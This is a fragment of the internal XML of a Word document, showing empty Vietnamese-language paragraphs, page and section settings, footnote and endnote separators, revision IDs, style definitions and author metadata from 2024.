            <wp:docPr id="1059728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8293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067A" w14:textId="77777777" w:rsidR="00C400D9" w:rsidRDefault="00C400D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA23723" w14:textId="77777777" w:rsidR="00C400D9" w:rsidRDefault="00C400D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0F6F2D" w14:textId="47A4F962" w:rsidR="00936569" w:rsidRPr="00A94971" w:rsidRDefault="00936569">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00936569" w:rsidRPr="00A94971" w:rsidSect="00027477">
      <w:footerReference w:type="default" r:id="rId50"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1134" w:right="1134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FD5D" w14:textId="77777777" w:rsidR="00027477" w:rsidRDefault="00027477" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="191A74F9" w14:textId="77777777" w:rsidR="00027477" w:rsidRDefault="00027477" w:rsidP="00EF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05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E4A0D" w14:textId="482C112D" w:rsidR="00EF2828" w:rsidRDefault="00EF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A6955" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2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D681" w14:textId="77777777" w:rsidR="00027477" w:rsidRDefault="00027477" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B250582" w14:textId="77777777" w:rsidR="00027477" w:rsidRDefault="00027477" w:rsidP="00EF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8"/>
    <w:rsid w:val="0000416F"/>
    <w:rsid w:val="00006510"/>
    <w:rsid w:val="00015217"/>
    <w:rsid w:val="00027477"/>
    <w:rsid w:val="00163879"/>
    <w:rsid w:val="002457D5"/>
    <w:rsid w:val="0027376B"/>
    <w:rsid w:val="00285EEF"/>
    <w:rsid w:val="002E6BD8"/>
    <w:rsid w:val="00360CBF"/>
    <w:rsid w:val="003C346A"/>
    <w:rsid w:val="003F2E8F"/>
    <w:rsid w:val="005C6290"/>
    <w:rsid w:val="00625334"/>
    <w:rsid w:val="007042C7"/>
    <w:rsid w:val="00727950"/>
    <w:rsid w:val="00882E7C"/>
    <w:rsid w:val="00936569"/>
    <w:rsid w:val="009E32D6"/>
    <w:rsid w:val="009F08EF"/>
    <w:rsid w:val="00A55FD3"/>
    <w:rsid w:val="00A9167C"/>
    <w:rsid w:val="00A94971"/>
    <w:rsid w:val="00AA7392"/>
    <w:rsid w:val="00B80517"/>
    <w:rsid w:val="00B973E7"/>
    <w:rsid w:val="00BA2CC9"/>
    <w:rsid w:val="00BC7A73"/>
    <w:rsid w:val="00BF60F7"/>
    <w:rsid w:val="00C400D9"/>
    <w:rsid w:val="00D65E58"/>
    <w:rsid w:val="00EB07A5"/>
    <w:rsid w:val="00EC0731"/>
    <w:rsid w:val="00EF2828"/>
    <w:rsid w:val="00F33A11"/>
    <w:rsid w:val="00FD10D5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E1B64B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{12FD41AE-BD1C-4362-8C62-11442238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76B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D65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E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E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E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E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E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E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E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E5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E5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E5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E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E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E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E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E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5E5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65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E5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282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28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82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28"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF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pn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F27-BFCF-40AD-9848-BC751C91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Anh Bùi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Quang Anh Bùi</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <cp:lastPrinted>2024-04-26T15:28:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-16T15:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-26T15:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>